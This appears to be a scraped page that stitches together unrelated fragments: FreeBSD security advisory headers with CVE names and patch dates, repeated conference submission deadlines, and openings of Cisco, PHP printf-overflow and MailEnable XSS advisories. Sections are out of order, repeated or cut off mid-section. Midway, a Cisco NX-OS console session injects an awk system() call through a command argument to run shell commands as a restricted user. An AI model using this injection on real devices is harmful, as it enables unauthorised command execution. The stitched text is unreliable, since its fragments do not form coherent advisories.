<< Previous Next >>
UTC
Category: core
Module: kern
Announced: 2010-07-13
Credits: Ming Fu
Affects: FreeBSD 7.x and later.
Corrected: 2010-07-13 02:45:17 UTC (RELENG_8, 8.1-PRERELEASE)
2010-07-13 02:45:17 UTC (RELENG_8_1, 8.1-RELEASE)
2010-07-13 02:45:17 UTC (RELENG_8_0, 8.0-RELEASE-p4)
2010-07-13 02:45:17 UTC (RELENG_7, 7.3-STABLE)
2010-07-13 02:45:17 UTC (RELENG_7_3, 7.3-RELEASE-p2)
2010-07-13 02:45:17 UTC (RELENG_7_1, 7.1-RELEASE-p13)
Category: core
Module: mountd
Announced: 2011-04-20
Credits: Ruslan Ermilov
Affects: All supported versions of FreeBSD
Corrected: 2011-04-20 21:00:24 UTC (RELENG_7, 7.4-STABLE)
2011-04-20 21:00:24 UTC (RELENG_7_3, 7.3-RELEASE-p5)
2011-04-20 21:00:24 UTC (RELENG_7_4, 7.4-RELEASE-p1)
2011-04-20 21:00:24 UTC (RELENG_8, 8.2-STABLE)
2011-04-20 21:00:24 UTC (RELENG_8_1, 8.1-RELEASE-p3)
2011-04-20 21:00:24 UTC (RELENG_8_2, 8.2-RELEASE-p1)
Category: core
Module: netinet6
Announced: 2009-06-10
Credits: Hiroki Sato
Affects: All supported versions of FreeBSD.
Corrected: 2009-06-10 10:31:11 UTC (RELENG_7, 7.2-STABLE)
2009-06-10 10:31:11 UTC (RELENG_7_2, 7.2-RELEASE-p1)
2009-06-10 10:31:11 UTC (RELENG_7_1, 7.1-RELEASE-p6)
2009-06-10 10:31:11 UTC (RELENG_6, 6.4-STABLE)
2009-06-10 10:31:11 UTC (RELENG_6_4, 6.4-RELEASE-p5)
2009-06-10 10:31:11 UTC (RELENG_6_3, 6.3-RELEASE-p11)
Category: core
Module: lukemftpd
Announced: 2009-01-07
Credits: Maksymilian Arciemowicz
Affects: All supported versions of FreeBSD.
Corrected: 2009-01-07 20:17:55 UTC (RELENG_7, 7.1-STABLE)
2009-01-07 20:17:55 UTC (RELENG_7_1, 7.1-RELEASE-p1)
2009-01-07 20:17:55 UTC (RELENG_7_0, 7.0-RELEASE-p8)
2009-01-07 20:17:55 UTC (RELENG_6, 6.4-STABLE)
2009-01-07 20:17:55 UTC (RELENG_6_4, 6.4-RELEASE-p2)
2009-01-07 20:17:55 UTC (RELENG_6_3, 6.3-RELEASE-p8)
Category: core
Module: sys_kern
Announced: 2008-12-23
Credits: Christer Oberg
Affects: All FreeBSD releases
Corrected: 2008-12-23 01:23:09 UTC (RELENG_7, 7.1-PRERELEASE)
2008-12-23 01:23:09 UTC (RELENG_7_1, 7.1-RC2)
2008-12-23 01:23:09 UTC (RELENG_7_0, 7.0-RELEASE-p7)
2008-12-23 01:23:09 UTC (RELENG_6, 6.4-STABLE)
2008-12-23 01:23:09 UTC (RELENG_6_4, 6.4-RELEASE-p1)
2008-12-23 01:23:09 UTC (RELENG_6_3, 6.3-RELEASE-p7)
Category: core
Module: etc_rc.d
Announced: 2007-01-11
Credits: Dirk Engling
Affects: All FreeBSD releases since 5.3
Corrected: 2007-01-11 18:16:58 UTC (RELENG_6, 6.2-STABLE)
2007-01-11 18:17:24 UTC (RELENG_6_2, 6.2-RELEASE)
2007-01-11 18:18:08 UTC (RELENG_6_1, 6.1-RELEASE-p12)
2007-01-11 18:18:35 UTC (RELENG_6_0, 6.0-RELEASE-p17)
2007-08-01 20:47:13 UTC (RELENG_5, 5.5-STABLE)
2007-08-01 20:48:19 UTC (RELENG_5_5, 5.5-RELEASE-p15)
Category: core
Module: ftpd
Announced: 2008-12-23
Credits: Maksymilian Arciemowicz
Affects: All supported versions of FreeBSD.
Corrected: 2008-12-23 01:23:09 UTC (RELENG_7, 7.1-PRERELEASE)
2008-12-23 01:23:09 UTC (RELENG_7_1, 7.1-RC2)
2008-12-23 01:23:09 UTC (RELENG_7_0, 7.0-RELEASE-p7)
2008-12-23 01:23:09 UTC (RELENG_6, 6.4-STABLE)
2008-12-23 01:23:09 UTC (RELENG_6_4, 6.4-RELEASE-p1)
2008-12-23 01:23:09 UTC (RELENG_6_3, 6.3-RELEASE-p7)
Category: contrib
Module: bind
Announced: 2011-05-28
Credits: Frank Kloeker, Michael Sinatra.
Affects: All supported versions of FreeBSD.
Corrected: 2011-05-28 00:58:19 UTC (RELENG_7, 7.4-STABLE)
2011-05-28 08:44:39 UTC (RELENG_7_3, 7.3-RELEASE-p6)
2011-05-28 08:44:39 UTC (RELENG_7_4, 7.4-RELEASE-p2)
2011-05-28 00:33:06 UTC (RELENG_8, 8.2-STABLE)
2011-05-28 08:44:39 UTC (RELENG_8_1, 8.1-RELEASE-p4)
2011-05-28 08:44:39 UTC (RELENG_8_2, 8.2-RELEASE-p2)
Category: contrib
Module: tcpdump
Announced: 2007-08-01
Credits: "mu-b"
Affects: All supported versions of FreeBSD
Corrected: 2007-08-01 20:42:48 UTC (RELENG_6, 6.2-STABLE)
2007-08-01 20:44:58 UTC (RELENG_6_2, 6.2-RELEASE-p7)
2007-08-01 20:45:49 UTC (RELENG_6_1, 6.1-RELEASE-p19)
2007-08-01 20:47:13 UTC (RELENG_5, 5.5-STABLE)
2007-08-01 20:48:19 UTC (RELENG_5_5, 5.5-RELEASE-p15)
CVE Name: CVE-2007-3798
Category: core
Module: sys
Announced: 2008-11-24
Credits: Robert Woolley, Mark Murray, Maxim Dounin, Ruslan Ermilov
Affects: All supported versions of FreeBSD.
Corrected: 2008-11-24 17:39:39 UTC (RELENG_7, 7.1-PRERELEASE)
2008-11-24 17:39:39 UTC (RELENG_7_0, 7.0-RELEASE-p6)
2008-11-24 17:39:39 UTC (RELENG_6, 6.4-STABLE)
2008-11-24 17:39:39 UTC (RELENG_6_4, 6.4-RELEASE)
2008-11-24 17:39:39 UTC (RELENG_6_3, 6.3-RELEASE-p6)
CVE Name: CVE-2008-5162
Category: contrib
Module: openssl
Announced: 2007-10-03
Credits: Moritz Jodeit
Affects: All FreeBSD releases.
Corrected: 2007-10-03 21:39:43 UTC (RELENG_6, 6.2-STABLE)
2007-10-03 21:40:35 UTC (RELENG_6_2, 6.2-RELEASE-p8)
2007-10-03 21:41:22 UTC (RELENG_6_1, 6.1-RELEASE-p20)
2007-10-03 21:42:00 UTC (RELENG_5, 5.5-STABLE)
2007-10-03 21:42:32 UTC (RELENG_5_5, 5.5-RELEASE-p16)
CVE Name: CVE-2007-5135
Category: core
Module: nfsclient
Announced: 2010-05-27
Credits: Patroklos Argyroudis
Affects: FreeBSD 7.2 and later.
Corrected: 2010-05-27 03:15:04 UTC (RELENG_8, 8.1-PRERELEASE)
2010-05-27 03:15:04 UTC (RELENG_8_0, 8.0-RELEASE-p3)
2010-05-27 03:15:04 UTC (RELENG_7, 7.3-STABLE)
2010-05-27 03:15:04 UTC (RELENG_7_3, 7.3-RELEASE-p1)
2010-05-27 03:15:04 UTC (RELENG_7_2, 7.2-RELEASE-p8)
CVE Name: CVE-2010-2020
Category: core
Module: rtld
Announced: 2009-12-03
Affects: FreeBSD 7.0 and later.
Corrected: 2009-12-01 02:59:22 UTC (RELENG_8, 8.0-STABLE)
2009-12-03 09:18:40 UTC (RELENG_8_0, 8.0-RELEASE-p1)
2009-12-01 03:00:16 UTC (RELENG_7, 7.2-STABLE)
2009-12-03 09:18:40 UTC (RELENG_7_2, 7.2-RELEASE-p5)
2009-12-03 09:18:40 UTC (RELENG_7_1, 7.1-RELEASE-p9)
CVE Name: CVE-2009-4146, CVE-2009-4147
Category: contrib
Module: bind
Announced: 2007-08-01
Credits: Amit Klein
Affects: FreeBSD 5.3 and later.
Corrected: 2007-07-25 08:23:08 UTC (RELENG_6, 6.2-STABLE)
2007-08-01 20:44:58 UTC (RELENG_6_2, 6.2-RELEASE-p7)
2007-08-01 20:45:49 UTC (RELENG_6_1, 6.1-RELEASE-p19)
2007-07-25 08:24:40 UTC (RELENG_5, 5.5-STABLE)
2007-08-01 20:48:19 UTC (RELENG_5_5, 5.5-RELEASE-p15)
CVE Name: CVE-2007-2926
Category: core
Module: libc
Announced: 2008-01-14
Credits: Bjoern A. Zeeb and Nate Eldredge
Affects: FreeBSD 6.2
Corrected: 2008-01-14 22:57:45 UTC (RELENG_7, 7.0-PRERELEASE)
2008-01-14 22:55:54 UTC (RELENG_7_0, 7.0-RC2)
2008-01-14 22:56:05 UTC (RELENG_6, 6.3-PRERELEASE)
2008-01-14 22:56:18 UTC (RELENG_6_3, 6.3-RELEASE)
2008-01-14 22:56:44 UTC (RELENG_6_2, 6.2-RELEASE-p10)
CVE Name: CVE-2008-0122
Category: contrib
Module: zfs
Announced: 2010-01-06
Credits: Pawel Jakub Dawidek
Affects: FreeBSD 7.0 and later.
Corrected: 2009-11-14 11:59:59 UTC (RELENG_8, 8.0-STABLE)
2010-01-06 21:45:30 UTC (RELENG_8_0, 8.0-RELEASE-p2)
2010-01-06 21:45:30 UTC (RELENG_7, 7.2-STABLE)
2010-01-06 21:45:30 UTC (RELENG_7_2, 7.2-RELEASE-p6)
2010-01-06 21:45:30 UTC (RELENG_7_1, 7.1-RELEASE-p10)
Dates and Deadlines
===================
The deadline for submission is October 9th, 2009 Midnight (23:59) UTC.
Notification of acceptance will be sent by e-mail on November 8th,
2009 the latest. However, you may very well get your notification
earlier than that if needed. Final papers or slides are due by
November 27th, 2009.
Category: core
Module: sys_netinet6
Announced: 2008-10-01
Credits: David Miles
Affects: All supported versions of FreeBSD.
Corrected: 2008-10-01 00:32:59 UTC (RELENG_7, 7.1-PRERELEASE)
2008-10-01 00:32:59 UTC (RELENG_7_0, 7.0-RELEASE-p5)
2008-10-01 00:32:59 UTC (RELENG_6, 6.4-PRERELEASE)
2008-10-01 00:32:59 UTC (RELENG_6_3, 6.3-RELEASE-p5)
CVE Name: CVE-2008-2476
Category: contrib
Module: bind
Announced: 2008-07-13
Credits: Dan Kaminsky
Affects: All supported FreeBSD versions.
Corrected: 2008-07-12 10:07:33 UTC (RELENG_6, 6.3-STABLE)
2008-07-13 18:42:38 UTC (RELENG_6_3, 6.3-RELEASE-p3)
2008-07-13 18:42:38 UTC (RELENG_7, 7.0-STABLE)
2008-07-13 18:42:38 UTC (RELENG_7_0, 7.0-RELEASE-p3)
CVE Name: CVE-2008-1447
Category: core
Module: sys_amd64_amd64
Announced: 2008-09-03
Credits: Nate Eldredge
Affects: All supported FreeBSD/amd64 versions.
Corrected: 2008-08-21 09:58:18 UTC (RELENG_7, 7.0-STABLE)
2008-09-03 19:09:47 UTC (RELENG_7_0, 7.0-RELEASE-p4)
2008-09-03 19:09:47 UTC (RELENG_6, 6.4-PRERELEASE)
2008-09-03 19:09:47 UTC (RELENG_6_3, 6.3-RELEASE-p4)
CVE Name: CVE-2008-3890
Category: core
Module: sys_netinet6
Announced: 2008-09-03
Credits: Tom Parker, Bjoern A. Zeeb
Affects: All supported versions of FreeBSD.
Corrected: 2008-09-03 19:09:47 UTC (RELENG_7, 7.1-PRERELEASE)
2008-09-03 19:09:47 UTC (RELENG_7_0, 7.0-RELEASE-p4)
2008-09-03 19:09:47 UTC (RELENG_6, 6.4-PRERELEASE)
2008-09-03 19:09:47 UTC (RELENG_6_3, 6.3-RELEASE-p4)
CVE Name: CVE-2008-3530
Dates and Deadlines
===================
The deadline for submission is October 5th, 2008 Midnight (23:59) UTC.
Notification of acceptance will be sent by e-mail on November 7th,
2008 the
latest. However, you may very well get your notification earlier than
that if
needed. Final papers or slides are due by November 18th, 2008.
Warning: There is already a file existing with this name. Do you want to
overwrite (yes/no)? [no] y
nx1# sh clock | sec '* -f /bootflash/20110713.awk '
uid=2003(user) gid=504(network-operator)
11:16:04.082 UTC Wed Jul 13 2011
nx1# sh clock | sed 's/.*/BEGIN \{ system\(\"ls \/mnt\/cfg\/0\/"\) \}/'
> 20110713.awk
nx1# sh clock | sec '* -f /bootflash/20110713.awk '
http://www.cisco.com/warp/public/707/cisco-sa-20090818-bgp.shtml
Revision 1.0
For Public Release 2009 August 18 1500 UTC (GMT)
- ---------------------------------------------------------------------
Summary
=======
Category: core
Module: contrib
Announced: 2009-02-16
Affects: FreeBSD 7.x
Corrected: 2009-02-16 21:56:17 UTC (RELENG_7, 7.1-STABLE)
2009-02-16 21:56:17 UTC (RELENG_7_1, 7.1-RELEASE-p10)
2009-02-16 21:56:17 UTC (RELENG_7_0, 7.0-RELEASE-p3)
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
- --- 1. *printf() functions Integer Overflow ---
The main problem exists in formatted_print.c file.
cxib# uname -a
FreeBSD cxib.laptop 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008 root@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
cxib# php -v
PHP 5.2.5 (cli) (built: Mar 13 2008 21:34:01) (DEBUG)
Copyright (c) 1997-2007 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies
cxib# cat /www/printf.php
taken into consideration. We use hacking in a very broad sense of the
word, but we won't say no to excellent submissions on computer
security research.
Some of the many topics we want to hear more about
- Cloud security
- Mobile Hacking and Telecommunications Security
- Privacy
- Net Neutrality and Censorship
- Copyright
- Exploitation Techniques
Category: core
Module: kern
Announced: 2009-10-02
Credits: Przemyslaw Frasunek
Affects: FreeBSD 6.x
Corrected: 2009-10-02 18:09:56 UTC (RELENG_6, 6.4-STABLE)
2009-10-02 18:09:56 UTC (RELENG_6_4, 6.4-RELEASE-p7)
2009-10-02 18:09:56 UTC (RELENG_6_3, 6.3-RELEASE-p13)
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
ME020567: MailEnable webmail cross-site scripting vulnerability (CWE-79)
References: CVE-2012-0389
Discovered by: Sajjad Pourali, Narendra Shinde and Shahab NamaziKhah
Vendor advisory: http://www.mailenable.com/kb/Content/Article.asp?ID=me020567
Vendor contact: 2012-01-04 09:49:36 UTC
Vendor response: 2012-01-04 10:27:13 UTC (Peter Fregon from MailEnable)
Vendor fix and announcement: 2012-01-10 00:50:31 UTC
Vulnerability description:
Category: core
Module: kern
Announced: 2009-03-23
Affects: FreeBSD 7.x
Corrected: 2009-03-23 00:00:50 UTC (RELENG_7, 7.2-PRERELEASE)
2009-03-23 00:00:50 UTC (RELENG_7_1, 7.1-RELEASE-p4)
2009-03-23 00:00:50 UTC (RELENG_7_0, 7.0-RELEASE-p11)
CVE Name: CVE-2009-1041
For general information regarding FreeBSD Security Advisories,
<<Previous Next>>
|
